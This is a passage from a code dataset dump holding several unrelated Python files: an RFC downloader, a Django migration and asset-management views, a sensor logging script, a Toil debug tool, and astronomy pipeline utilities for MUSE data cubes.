obs_by = None\n up = None\n up_by = None\n al = None\n stat = None\n doi = None\n for att in brackets:\n if att.startswith('Format: '):\n form = att.split('Format: ')[1]\n elif att.startswith('Obsolotes '):\n obs = att.split('Obsolotes ')[1]\n elif att.startswith('Obsoleted by '):\n obs_by = att.split('Obsoleted by ')[1]\n elif att.startswith('Updates '):\n up = att.split('Updates ')[1]\n elif att.startswith('Updated by '):\n up_by = att.split('Updated by ')[1]\n elif att.startswith('Also '):\n al = att.split('Also ')[1]\n elif att.startswith('Status: '):\n stat = att.split('Status: ')[1]\n elif att.startswith('DOI: '):\n doi = att.split('DOI: ')[1]\n line = line.split('(Format')[0].rstrip() # Remove bracket attributes from the line.\n\n # Get the date of publication.\n split_line = line.split(\".\")\n split_line = [l for l in split_line if l != '']\n date = split_line[-1].lstrip()\n line = line.replace(date + '.', '') # Remove date from line.\n\n # Get name of RFC.\n name = line.split()[0]\n line = line.replace(name, '') # Remove name from line.\n\n # Get title of RFC.\n split_line = line.split('.')\n title = split_line.pop(0)\n while not split_line[0].isspace() and not (len(split_line[0]) == 2 and split_line[0][0].isspace() and split_line[0][1].isupper()):\n title += ('.' 
+ split_line.pop(0)) # This line deals with a title that contains dots.\n line = line.replace(title + '.', '') # Remove title from line.\n\n # Get authors.\n aut = line.lstrip().rstrip()[:-1]\n\n # Append all info to corresponding list.\n names.append(name)\n titles.append(title)\n authors.append(aut)\n dates.append(date)\n formats.append(form)\n obsolotes.append(obs)\n obsoloted.append(obs_by)\n updates.append(up)\n updated.append(up_by)\n also.append(al)\n status.append(stat)\n dois.append(doi)\n\n # Create dataframe.\n d = {'Name':names,\n 'Title':titles,\n 'Authors':authors,\n 'Date':dates,\n 'Formats':formats,\n 'Obsolotes':obsolotes,\n 'Obsoloted_by':obsoloted,\n 'Updates':updates,\n 'Updated_by':updated,\n 'Also_FYI':also,\n 'Status':status,\n 'DOI':dois}\n df = pd.DataFrame(d)\n return df\n\n\ndef download_all(rfc_base_url, rfc_ids, outdir):\n \"\"\"\n \"\"\"\n os.makedirs(outdir, exist_ok=True) # Create output directory if not exists.\n\n errors = [] # Keep track of rfc badly downloaded.\n for rfc in tqdm(rfc_ids):\n url = rfc_base_url + rfc + '.txt' # Create the download url.\n try:\n wget.download(url, outdir)\n except Exception as e:\n errors.append(rfc)\n print(\"{}: HTTP Error 404 - Not Found.\".format(rfc))\n \n return errors\n\n\ndef update_dataframe(df, errors):\n \"\"\"\n Given the download errors, remove the corresponding rfc from the database.\n \"\"\"\n df['Name'] = df['Name'].str.lower()\n df = df[~df['Name'].isin(errors)]\n return df\n \n\ndef main(args):\n \"\"\"\n \"\"\"\n print(\"\\nDownload the index page at {}...\".format(args.index_url))\n page = requests.get(args.index_url)\n \n print(\"\\nExtract all RFC lines...\")\n rfc_lines = get_rfc_lines(page)\n \n print(\"\\nProcess index lines...\")\n df = create_dataframe(rfc_lines)\n \n print(\"\\nDownload all RFC files to {}...\".format(os.path.join(args.outdir, 'raw')))\n rfc_ids = df['Name'].str.lower().tolist()\n errors = download_all(args.rfc_base_url, rfc_ids, os.path.join(args.outdir, 'raw'))\n print(\"Download errors: {}\".format(str(errors)))\n \n # Remove from df the rfc that were not downloaded (as it is this database that is used for cleaning files).\n df = update_dataframe(df, errors)\n os.makedirs(args.outdir, exist_ok=True)\n df.to_csv(os.path.join(args.outdir, 'info.csv'), sep=',', encoding='utf-8', float_format='%.10f', decimal='.')\n print(\"\\nDONE.\")\n\n\nif __name__==\"__main__\":\n args = parse_arguments()\n main(args)\n","sub_path":"index_creation/tools/download_all.py","file_name":"download_all.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"414629061","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('icekit_events', '0011_event_show_in_calendar'),\n ]\n\n operations = [\n migrations.AlterModelTable(\n name='event',\n table=None,\n ),\n migrations.AlterModelTable(\n name='recurrencerule',\n table=None,\n ),\n migrations.RunSQL(\n \"UPDATE django_content_type SET app_label='icekit_events' WHERE app_label='eventkit'\",\n # No-op: I haven't yet found a way to make this reversible in the\n # way you would expect without unique constraint DB errors, whereas\n # it works (according to unit tests at least) with a no-op.\n \"UPDATE django_content_type SET app_label=app_label WHERE app_label='NONE!'\",\n ),\n 
]\n","sub_path":"icekit_events/migrations/0012_auto_20160706_1606.py","file_name":"0012_auto_20160706_1606.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"420801886","text":"import os\nos.environ['DJANGO_SETTINGS_MODULE']='weathersite.settings'\n\nimport signal\nimport sys\nimport argparse\nimport logging\nfrom sensorlib.DataGatherer import DataGatherer\n\ndef signal_handler(signal, frame):\n\tlogger.info(\"User interrupted. Cleaning up and exiting.\")\n\tmyDataGatherer.cleanup()\n\tsys.exit(0)\n\ndef positive_int(value):\n\tivalue = int(value)\n\tif ivalue < 0:\n\t\traise argparse.ArgumentTypeError(\"invalid positive_int value: '%s'\" % value)\n\treturn ivalue\n\t\nparser = argparse.ArgumentParser(description='Process some integers', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('-s', '--sample-rate', default=900, type=positive_int, help=\"Rate at which to sample data from the sensors in seconds. Choose between 120 seconds (2 min) and 86400 seconds (24 hours)\")\nparser.add_argument('-n', '--number', default=0, type=positive_int, help=\"Number of samples to take. 0 means keep sampling indefinitely\")\nparser.add_argument('-q', '--quiet', action='store_true', help=\"Log to the log file instead of the console\")\n\nargs = parser.parse_args()\nif (args.sample_rate < 120):\n\targs.sample_rate = 120\nif (args.sample_rate > 86400):\n\targs.sample_rate = 86400\n\nlogger = logging.getLogger('weathersite.console')\nif (args.quiet):\n\tlogger = logging.getLogger('weathersite.weatherapp')\n\nsignal.signal(signal.SIGINT, signal_handler)\nmyDataGatherer = DataGatherer(args.sample_rate, args.number, logger)\nmyDataGatherer.probe()","sub_path":"sensor_data_gatherer.py","file_name":"sensor_data_gatherer.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"77070876","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse\nfrom django.views.generic import UpdateView\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import date\n\nfrom .models import Asset\nfrom history.models import History\nfrom custodians.models import Custodian\nfrom categories.models import SubCategory, Category\nfrom allocations.models import Allocation\n\n# from .forms import AssetForm, AssignForm\nfrom pages.decorators import allowed_users\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco', 'logmanager', 'logofficer', 'logassistant'])\ndef list_view(request):\n\n queryset = reversed(Asset.objects.all())\n context = {\n \"object_list\": queryset\n }\n return render(request, \"list_view.html\", context)\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco', 'logmanager', 'logofficer', 'logassistant'])\ndef detail_view(request,asset_id):\n #Show method if exists:\n obj = get_object_or_404(Asset, id=asset_id)\n queryset = reversed(Allocation.objects.filter(assets=asset_id))\n\n context = {\n \"object\": obj,\n \"object_list\": queryset\n }\n return render(request, \"asset_details.html\", context)\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco', 'logmanager', 'logofficer'])\ndef create_view(request):\n if request.method == \"GET\":\n queryset = SubCategory.objects.all()\n context ={\n \"object\": queryset\n }\n return render(request, \"asset_create.html\", 
context)\n if request.method == \"POST\":\n #Asset info\n c_tag = request.POST.get('tag_number')\n c_brand = request.POST.get('brand')\n c_model = request.POST.get('model')\n c_serial = request.POST.get('serial')\n c_description = request.POST.get('description')\n data = request.POST.get('sub_cat')\n c_sub_cat = SubCategory.objects.get(id=data)\n #User info\n c_location = request.POST.get('location')\n c_physical_location = request.POST.get('physical_location')\n c_condition = request.POST.get('condition')\n c_accessories = request.POST.get('accessories')\n #Purchase Info\n c_purchaseReferece = request.POST.get('purchaseReference')\n c_purchaseDate = request.POST.get('purchaseDate')\n c_price = request.POST.get('price')\n c_donor = request.POST.get('donor')\n c_budgetCode = request.POST.get('budgetCode')\n c_supplierName = request.POST.get('supplierName')\n c_comments = request.POST.get('comments')\n\n # Create Code\n new = Asset.objects.create(tag_number=c_tag,\n brand = c_brand,\n model = c_model,\n serial = c_serial,\n sub_category = c_sub_cat,\n description = c_description,\n price = c_price,\n location = c_location,\n physical_location = c_physical_location,\n condition = c_condition,\n accessories = c_accessories,\n donor = c_donor,\n budgetCode = c_budgetCode,\n purchaseReference = c_purchaseReferece,\n purchaseDate = c_purchaseDate,\n supplierName = c_supplierName,\n comments = c_comments)\n return redirect(\"/assets/list_view/\", {})\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco', 'logmanager', 'logofficer'])\ndef update_view(request, asset_id):\n\n if request.method == 'POST':\n obj = get_object_or_404(Asset, id=asset_id)\n # Asset info\n obj.tag = request.POST.get('tag_number')\n obj.brand = request.POST.get('brand')\n obj.model = request.POST.get('model')\n obj.serial = request.POST.get('serial')\n obj.description = request.POST.get('description')\n data = request.POST.get('sub_cat')\n obj.sub_category = SubCategory.objects.get(id=data)\n # User info\n obj.location = request.POST.get('location')\n obj.physical_location = request.POST.get('physical_location')\n obj.condition = request.POST.get('condition')\n obj.accessories = request.POST.get('accessories')\n # Purchase Info\n obj.purchaseReferece = request.POST.get('purchaseReference')\n obj.purchaseDate = request.POST.get('purchaseDate')\n obj.price = request.POST.get('price')\n obj.donor = request.POST.get('donor')\n obj.budgetCode = request.POST.get('budgetCode')\n obj.supplierName = request.POST.get('supplierName')\n obj.comments = request.POST.get('comments')\n\n data = request.POST.get('custodian')\n # gets \"custodian_id\" from post data\n obj.custodian = Custodian.objects.get(id=data)\n # gets \"custodian\"\n\n obj.save()\n\n\n return redirect('assets:asset-detail', asset_id=asset_id)\n\n asset = get_object_or_404(Asset, id=asset_id)\n obj2 = Custodian.objects.all()\n obj3 = SubCategory.objects.all()\n context = {\n \"object\": asset,\n \"custodian\": obj2,\n \"subcategory\": obj3\n }\n return render(request, \"asset_update.html\", context)\n\n\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco', 'logmanager', 'logofficer', 'logassistant'])\ndef assign_view(request, asset_id):\n\n # gets the values of the URL\n if request.method == \"GET\":\n obj = get_object_or_404(Asset, id=asset_id)\n obj2 = Custodian.objects.all()\n context = {\n \"object\": obj,\n \"custodian\": obj2\n }\n return render(request, \"asset_assign.html\", context)\n\n # for posting the values of 
the URL\n if request.method == \"POST\":\n a_id = get_object_or_404(Asset, id=asset_id)\n a_id.location = request.POST.get('location')\n a_id.physical_location = request.POST.get('physical_location')\n a_id.comments = request.POST.get('comments')\n #gets \"asset\"\n data = request.POST.get('custodian')\n #gets \"custodian_id\" from post data\n c_id = Custodian.objects.get(id=data)\n #gets \"custodian\"\n\n a_id.custodian = c_id #assigns id field of custodian to the asset's field\n a_id.save()\n\n ret = History.objects.create(asset_id=a_id, custodian_id=c_id) #creates history of the assignment\n\n return redirect('assets:asset-detail', asset_id=asset_id)\n\n\n\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco'])\ndef delete_view(request,product_id):\n #Show method if exists:\n obj = Asset.objects.get(id=product_id)\n #delete method:\n obj.delete()\n context = {\n }\n return render(request, \"delete_view.html\", context)\n\n\n\n# Create your views here.\n","sub_path":"assets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"609609688","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/toil/utils/toilDebugJob.py\n# Compiled at: 2020-05-07 00:32:15\n# Size of source mod 2**32: 2595 bytes\n\"\"\"Debug tool for running a toil job locally.\n\"\"\"\nfrom __future__ import absolute_import\nimport logging\nfrom toil.lib.bioio import getBasicOptionParser\nfrom toil.lib.bioio import parseBasicOptions\nfrom toil.common import jobStoreLocatorHelp, Config, Toil\nfrom toil.version import version\nfrom toil.worker import workerScript\nfrom toil.utils.toilDebugFile import printContentsOfJobStore\nlogger = logging.getLogger(__name__)\n\ndef print_successor_jobs():\n pass\n\n\ndef main():\n parser = getBasicOptionParser()\n parser.add_argument('jobStore', type=str, help=('The location of the job store used by the workflow.' 
+ jobStoreLocatorHelp))\n parser.add_argument('jobID', nargs=1, help='The job store id of a job within the provided jobstore to run by itself.')\n parser.add_argument('--printJobInfo', nargs=1, help='Return information about this job to the user including preceding jobs, inputs, outputs, and runtime from the last known run.')\n parser.add_argument('--version', action='version', version=version)\n options = parseBasicOptions(parser)\n config = Config()\n config.setOptions(options)\n jobStore = Toil.resumeJobStore(config.jobStore)\n if options.printJobInfo:\n printContentsOfJobStore(jobStorePath=(options.jobStore), nameOfJob=(options.printJobInfo))\n jobID = options.jobID[0]\n logger.debug('Going to run the following job locally: %s', jobID)\n workerScript(jobStore, config, jobID, jobID, redirectOutputToLogFile=False)\n logger.debug('Ran the following job locally: %s', jobID)","sub_path":"pycfiles/toil-4.1.0-py3.6/toilDebugJob.cpython-36.py","file_name":"toilDebugJob.cpython-36.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"547386128","text":"# Licensed under a MIT license - see LICENSE\n\n\"\"\"MUSE-PHANGS utility functions for pymusepipe\n\"\"\"\n\n__authors__ = \"Eric Emsellem\"\n__copyright__ = \"(c) 2017, ESO + CRAL\"\n__license__ = \"MIT License\"\n__contact__ = \" \"\n\n# Importing modules\nimport os\nimport time\nfrom os.path import join as joinpath\nimport copy\n\n# Numpy\nimport numpy as np\n\nfrom astropy import constants as const\nfrom astropy.io import fits as pyfits\n\n# Import package modules\nfrom .emission_lines import list_emission_lines\nfrom .emission_lines import full_muse_wavelength_range\nfrom .config_pipe import default_filter_list\nfrom . 
import util_pipe as upipe\n\nfrom mpdaf.obj import Image, Cube\n\nfrom collections import OrderedDict\n\n############ PRINTING FUNCTIONS #########################\nHEADER = '\\033[95m'\nOKBLUE = '\\033[94m'\nOKGREEN = '\\033[92m'\nWARNING = '\\033[0;31;20m'\nINFO = '\\033[0;32;20m'\nERROR = '\\033[1;91m'\nENDC = '\\033[0m'\nBOLD = '\\033[1m'\nDEBUG = '\\033[1m'\n\ndef print_endline(text, **kwargs):\n print(INFO + text + ENDC, **kwargs)\n\ndef print_warning(text, **kwargs):\n toprint = \"# MusePipeWarning \" + text\n mypipe = kwargs.pop(\"pipe\", None)\n try:\n mypipe.write_logfile(toprint)\n except:\n pass\n try:\n verbose = mypipe.verbose\n except:\n verbose = kwargs.pop(\"verbose\", True)\n \n if verbose:\n print(WARNING + \"# MusePipeWarning \" + ENDC + text, **kwargs)\n\ndef print_info(text, **kwargs):\n \"\"\"Print processing information\n\n Input\n -----\n text: str\n pipe: musepipe [None]\n If provided, will print the text in the logfile\n \"\"\"\n toprint = \"# MusePipeInfo \" + text\n mypipe = kwargs.pop(\"pipe\", None)\n try:\n mypipe.write_logfile(toprint)\n except:\n pass\n try:\n verbose = mypipe.verbose\n except:\n verbose = kwargs.pop(\"verbose\", True)\n \n if verbose:\n print(INFO + \"# MusePipeInfo \" + ENDC + text, **kwargs)\n\ndef print_debug(text, **kwargs) :\n \"\"\"Print debugging information\n\n Input\n -----\n text: str\n pipe: musepipe [None]\n If provided, will print the text in the logfile\n \"\"\"\n mypipe = kwargs.pop(\"pipe\", None)\n try:\n verbose = mypipe.verbose\n except:\n verbose = kwargs.pop(\"verbose\", True)\n \n if verbose:\n print(DEBUG + \"# DebugInfo \" + ENDC + text, **kwargs)\n\ndef print_error(text, **kwargs):\n \"\"\"Print error information\n\n Input\n -----\n text: str\n pipe: musepipe [None]\n If provided, will print the text in the logfile\n \"\"\"\n toprint = \"# MusePipeError \" + text\n mypipe = kwargs.pop(\"pipe\", None)\n try:\n mypipe.write_logfile(toprint)\n except:\n pass\n try:\n verbose = mypipe.verbose\n except:\n verbose = kwargs.pop(\"verbose\", True)\n \n if verbose:\n print(ERROR + \"# MusePipeError \" + ENDC + text, **kwargs)\n\n#----------- END PRINTING FUNCTIONS -----------------------\ndef add_string(text, word=\"_\", loc=0):\n \"\"\"Adding string at given location\n Default is underscore for string which are not empty.\n\n Input\n ----\n text (str): input text\n word (str): input word to be added\n loc (int): location in 'text'. 
[Default is 0=start]\n If None, will be added at the end.\n\n Returns\n ------\n Updated text\n \"\"\"\n if len(text) > 0:\n if loc is None:\n text = f\"{text}{word}\"\n else:\n try:\n if text[loc] != \"_\":\n text = f\"{text[:loc]}{word}{text[loc:]}\"\n\n except:\n print(f\"String index [{loc}] out of range [{len(text)}] in add_string\")\n\n return text\n\ndef lower_rep(text):\n \"\"\"Lower the text and return it after removing all underscores\n\n Args:\n text (str): text to treat\n\n Returns:\n updated text (with removed underscores and lower-cased)\n\n \"\"\"\n return text.replace(\"_\", \"\").lower()\n\ndef lower_allbutfirst_letter(mystring):\n \"\"\"Lowercase all letters except the first one\n \"\"\"\n return mystring[0].upper() + mystring[1:].lower()\n\nclass TimeStampDict(OrderedDict):\n \"\"\"Class which builds a time stamp driven\n dictionary of objects\n \"\"\"\n def __init__(self, description=\"\", myobject=None):\n \"\"\"Initialise an empty dictionary\n with a given name\n \"\"\"\n OrderedDict.__init__(self)\n self.description = description\n self.create_new_timestamp(myobject)\n\n def create_new_timestamp(self, myobject=None):\n \"\"\"Create a new item in dictionary\n using a time stamp\n \"\"\"\n if myobject is not None:\n self.present_tstamp = create_time_name()\n self[self.present_tstamp] = myobject\n else:\n self.present_stamp = None\n\n def delete_timestamp(self, tstamp=None):\n \"\"\"Delete a key in the dictionary\n \"\"\"\n _ = self.pop(tstamp)\n\ndef create_time_name() :\n \"\"\"Create a time-link name for file saving purposes\n\n Return: a string including the YearMonthDay_HourMinSec\n \"\"\"\n return str(time.strftime(\"%Y%m%d_%H%M%S\", time.localtime()))\n\ndef formatted_time() :\n \"\"\" Return: a string including the formatted time\n \"\"\"\n return str(time.strftime(\"%d-%m-%Y %H:%M:%S\", time.localtime()))\n\ndef safely_create_folder(path, verbose=True):\n \"\"\"Create a folder given by the input path\n This small function tries to create it and if it fails\n it checks whether the reason is because it is not a path\n and then warn the user\n and then warn the user\n \"\"\"\n if path is None :\n if verbose : print_info(\"Input path is None, not doing anything\")\n return\n if verbose : \n print_info(\"Trying to create {folder} folder\".format(folder=path), end='')\n try: \n os.makedirs(path)\n if verbose:\n print_endline(\"... Done\", end='\\n')\n except OSError:\n if not os.path.isdir(path):\n print_error(\"Failed to create folder! Please check the path\")\n return\n if os.path.isdir(path):\n if verbose:\n print_endline(\"... Folder already exists, doing nothing.\")\n\ndef append_file(filename, content):\n \"\"\"Append in ascii file\n \"\"\"\n with open(filename, \"a\") as myfile:\n myfile.write(content)\n \ndef abspath(path) :\n \"\"\"Normalise the path to get it short but absolute\n \"\"\"\n return os.path.abspath(os.path.realpath(path))\n\ndef normpath(path) :\n \"\"\"Normalise the path to get it short\n \"\"\"\n return os.path.normpath(os.path.realpath(path))\n\ndef doppler_shift(wavelength, velocity=0.):\n \"\"\"Return the redshifted wavelength\n \"\"\"\n doppler_factor = np.sqrt((1. + velocity / const.c.value) / (1. 
- velocity / const.c.value))\n return wavelength * doppler_factor\n\ndef get_emissionline_wavelength(line=\"Ha\", velocity=0., redshift=None, medium='air'):\n \"\"\"Get the wavelength of an emission line, including a correction\n for the redshift (or velocity)\n \"\"\"\n index_line = {'vacuum': 0, 'air': 1}\n # Get the velocity\n if redshift is not None : velocity = redshift * const.c\n\n if line is None:\n return -1.\n elif line not in list_emission_lines:\n upipe.print_error(\"Could not guess the emission line you wish to use\")\n upipe.print_error(\"Please review the 'emission_line' dictionary\")\n return -1.\n\n if medium not in index_line:\n upipe.print_error(\"Please choose between one of these media: {0}\".format(index_line.key()))\n return -1.\n\n wavel = list_emission_lines[line][index_line[medium]]\n return doppler_shift(wavel, velocity)\n\ndef get_emissionline_band(line=\"Ha\", velocity=0., redshift=None, medium='air', lambda_window=10.0):\n \"\"\"Get the wavelengths of an emission line, including a correction\n for the redshift (or velocity) and a lambda_window around that line (in Angstroems)\n\n Parameters\n ----------\n line: name of the line (string). Default is 'Ha'\n velocity: shift in velocity (km/s)\n medium: 'air' or 'vacuum'\n lambda_window: lambda_window in Angstroem\n \"\"\"\n red_wavel = get_emissionline_wavelength(line=line, velocity=velocity, redshift=redshift, medium=medium)\n # In case the line is not in the list, just return the full lambda Range\n if red_wavel < 0 :\n return full_muse_wavelength_range\n else:\n return [red_wavel - lambda_window/2., red_wavel + lambda_window/2.]\n\n \ndef select_spaxels(maskDic, maskName, X, Y) :\n \"\"\"Selecting spaxels defined by their coordinates\n using the masks defined by Circle or Rectangle Zones\n \"\"\"\n ## All spaxels are set to GOOD (True) first\n selgood = (X**2 >= 0)\n\n ## If no Mask is provided, we just return the full set of input X, Y\n if maskDic == None :\n return selgood\n\n ## We first check if the maskName is in the list of the defined Masks\n ## If the galaxy is not in the list, then the selection is all True\n if maskName in maskDic:\n ## The mask is defined, so Get the list of Regions\n ## From the defined dictionary\n listRegions = maskDic[maskName]\n ## For each region, select the good spaxels\n for region in listRegions :\n selgood = selgood & region.select(X, Y)\n\n return selgood\n\n\nclass Selection_Zone :\n \"\"\"\n Parent class for Rectangle_Zone and Circle_Zone\n\n Input\n -----\n params: list of floats\n List of parameters for the selection zone\n \"\"\"\n def __init__(self, params=None) :\n self.params = params\n if len(params) != self.nparams:\n print_error(\"Error: {0} Zone needs {1} input parameters - {2} given\".format(\n self.type, self.nparams, len(params)))\n\n\nclass Rectangle_Zone(Selection_Zone) :\n \"\"\"Define a rectangular zone, given by \n a center, a length, a width and an angle\n \"\"\"\n def __init__(self):\n self.type = \"Rectangle\"\n self.nparams = 5\n Selection_Zone.__init__(self)\n\n def select(self, xin, yin) :\n \"\"\" Define a selection within a rectangle\n It can be rotated by an angle theta (in degrees) \n Input\n -----\n xin, yin: 2d arrays\n Input positions for the spaxels\n \"\"\"\n if self.params == None :\n return (xin**2 >=0)\n [x0, y0, length, width, theta] = self.params\n dx = xin - x0\n dy = yin - y0\n thetarad = np.deg2rad(theta)\n nx = dx * np.cos(thetarad) + dy * np.sin(thetarad)\n ny = - dx * np.sin(thetarad) + dy * np.cos(thetarad)\n selgood = 
(np.abs(ny) > width / 2.) | (np.abs(nx) > length / 2.)\n return selgood\n\nclass Circle_Zone(Selection_Zone) :\n \"\"\"Define a Circular zone, defined by \n a center and a radius\n \"\"\"\n def __init__(self):\n self.type = \"Circle\"\n self.nparams = 5\n Selection_Zone.__init__(self)\n\n def select(self, xin, yin) :\n \"\"\" Define a selection within a circle \n\n Input\n -----\n xin, yin: 2d arrays\n Input positions for the spaxels\n \"\"\"\n if self.params == None :\n return (xin**2 >=0)\n [x0, y0, radius] = self.params\n selgood = (np.sqrt((xin - x0)**2 + (yin - y0)**2) > radius)\n return selgood\n\nclass Trail_Zone(Selection_Zone) :\n \"\"\"Define a Trail zone, defined by\n two points and a width\n \"\"\"\n def __init__(self):\n self.type = \"Trail\"\n self.nparams = 5\n Selection_Zone.__init__(self)\n\n def select(self, xin, yin) :\n \"\"\" Define a selection within trail\n\n Input\n -----\n xin, yin: 2d arrays\n Input positions for the spaxels\n\n \"\"\"\n if self.params == None :\n return (xin**2 >=0)\n [x0, y0, radius] = self.params\n selgood = (np.sqrt((xin - x0)**2 + (yin - y0)**2) > radius)\n return selgood\n\ndef reconstruct_filter_images(cubename, filter_list=default_filter_list,\n filter_fits_file=\"filter_list.fits\"):\n \"\"\" Reconstruct all images in a list of Filters\n cubename: str\n Name of the cube\n filter_list: str\n List of filters, e.g., \"Cousins_R,Johnson_I\"\n By default, the default_filter_list from pymusepipe.config_pipe\n\n filter_fits_file: str\n Name of the fits file containing all the filter characteristics\n Usually in filter_list.fits (MUSE default)\n \"\"\"\n \n command = \"muse_cube_filter -f {0} {1} {2}\".format(\n filter_list, cubename, filter_fits_file)\n os.system(command)\n\ndef add_key_pointing_expo(imaname, iexpo, pointing):\n \"\"\"Add pointing and expo number to image\n\n Input\n -----\n imaname: str\n iexpo: int\n pointing: int\n \"\"\"\n # Writing the pointing and iexpo in the IMAGE_FOV\n this_image = pyfits.open(imaname, mode='update')\n this_image[0].header['MUSEPIPE_POINTING'] = (pointing, \"Pointing number\")\n this_image[0].header['MUSEPIPE_IEXPO'] = (iexpo, \"Exposure number\")\n this_image.flush()\n print_info(\"Keywords MUSEPIPE_POINTING/EXPO updated for image {}\".format(\n imaname))\n\ndef rotate_image_wcs(ima_name, ima_folder=\"\", outwcs_folder=None, rotangle=0.,\n **kwargs):\n \"\"\"Routine to remove potential Nan around an image and reconstruct\n an optimal WCS reference image. The rotation angle is provided as a way\n to optimise the extent of the output image, removing Nan along X and Y\n at that angle.\n\n Args:\n ima_name (str): input image name. No default.\n ima_folder (str): input image folder ['']\n outwcs_folder (str): folder where to write the output frame. 
Default is\n None which means that it will use the folder of the input image.\n rotangle (float): rotation angle in degrees [0]\n **kwargs:\n in_suffix (str): in suffix to remove from name ['prealign']\n out_suffix (str): out suffix to add to name ['rotwcs']\n margin_factor (float): factor to extend the image [1.1]\n\n Returns:\n\n \"\"\"\n\n # Reading the input names and setting output folder\n fullname = joinpath(ima_folder, ima_name)\n ima_folder, ima_name = os.path.split(fullname)\n if outwcs_folder is None:\n outwcs_folder = ima_folder\n\n # Suffix\n in_suffix = kwargs.pop(\"in_suffix\", \"prealign\")\n out_suffix = kwargs.pop(\"out_suffix\", \"rotwcs\")\n\n # Get margin if needed\n margin_factor = kwargs.pop(\"margin_factor\", 1.1)\n extend_fraction = np.maximum(0., (margin_factor - 1.))\n upipe.print_info(\"Will use a {:5.2f}% extra margin\".format(\n extend_fraction*100.))\n\n # Opening the image via mpdaf\n imawcs = Image(fullname)\n extra_pixels = (np.array(imawcs.shape) * extend_fraction).astype(np.int)\n\n # New dimensions and extend current image\n new_dim = tuple(np.array(imawcs.shape).astype(np.int) + extra_pixels)\n ima_ext = imawcs.regrid(newdim=new_dim, refpos=imawcs.get_start(),\n refpix=tuple(extra_pixels / 2.),\n newinc=imawcs.get_step()[0]*3600.)\n\n # Copy and rotate WCS\n new_wcs = copy.deepcopy(ima_ext.wcs)\n upipe.print_info(\"Rotating WCS by {} degrees\".format(rotangle))\n new_wcs.rotate(rotangle)\n\n # New rotated image\n ima_rot = Image(data=np.nan_to_num(ima_ext.data), wcs=new_wcs)\n\n # Then resample the image using the initial one as your reference\n ima_rot_resampled = ima_rot.align_with_image(ima_ext, flux=True)\n\n # Crop NaN\n ima_rot_resampled.crop()\n\n # get the new header with wcs and rotate back\n finalwcs = ima_rot_resampled.wcs\n finalwcs.rotate(-rotangle)\n\n # create the final image\n final_rot_image = Image(data=ima_rot_resampled.data, wcs=finalwcs)\n\n # Save image\n if isinstance(in_suffix, str) and in_suffix != \"\" and in_suffix in ima_name:\n out_name = ima_name.replace(in_suffix, out_suffix)\n else:\n name, extension = os.path.splitext(ima_name)\n out_suffix = add_string(out_suffix)\n out_name = \"{0}{1}{2}\".format(name, out_suffix, extension)\n\n # write output\n final_rot_image.write(joinpath(outwcs_folder, out_name))\n return outwcs_folder, out_name\n\ndef rotate_cube_wcs(cube_name, cube_folder=\"\", outwcs_folder=None, rotangle=0.,\n **kwargs):\n \"\"\"Routine to remove potential Nan around an image and reconstruct\n an optimal WCS reference image. The rotation angle is provided as a way\n to optimise the extent of the output image, removing Nan along X and Y\n at that angle.\n\n Args:\n cube_name (str): input image name. No default.\n cube_folder (str): input image folder ['']\n outwcs_folder (str): folder where to write the output frame. 
Default is\n None which means that it will use the folder of the input image.\n rotangle (float): rotation angle in degrees [0]\n **kwargs:\n in_suffix (str): in suffix to remove from name ['prealign']\n out_suffix (str): out suffix to add to name ['rotwcs']\n margin_factor (float): factor to extend the image [1.1]\n\n Returns:\n\n \"\"\"\n\n # Reading the input names and setting output folder\n fullname = joinpath(cube_folder, cube_name)\n cube_folder, cube_name = os.path.split(fullname)\n if outwcs_folder is None:\n outwcs_folder = cube_folder\n\n # Suffix\n in_suffix = kwargs.pop(\"in_suffix\", \"prealign\")\n out_suffix = kwargs.pop(\"out_suffix\", \"rotwcs\")\n\n # Get margin if needed\n margin_factor = kwargs.pop(\"margin_factor\", 1.1)\n extend_fraction = np.maximum(0., (margin_factor - 1.))\n upipe.print_info(\"Will use a {:5.2f}% extra margin\".format(\n extend_fraction*100.))\n\n # Opening the image via mpdaf\n cubewcs = Cube(fullname)\n imawcs = cubewcs.sum(axis=0)\n extra_pixels = (np.array(imawcs.shape) * extend_fraction).astype(np.int)\n\n # New dimensions and extend current image\n new_dim = tuple(np.array(imawcs.shape).astype(np.int) + extra_pixels)\n ima_ext = imawcs.regrid(newdim=new_dim, refpos=imawcs.get_start(),\n refpix=tuple(extra_pixels / 2.),\n newinc=imawcs.get_step()[0]*3600.)\n\n # Copy and rotate WCS\n new_wcs = copy.deepcopy(ima_ext.wcs)\n upipe.print_info(\"Rotating spatial WCS of Cube by {} degrees\".format(rotangle))\n new_wcs.rotate(rotangle)\n\n # New rotated image\n ima_rot = Image(data=np.nan_to_num(ima_ext.data), wcs=new_wcs)\n\n # Then resample the image using the initial one as your reference\n ima_rot_resampled = ima_rot.align_with_image(ima_ext, flux=True)\n\n # Crop NaN\n ima_rot_resampled.crop()\n\n # get the new header with wcs and rotate back\n finalwcs = 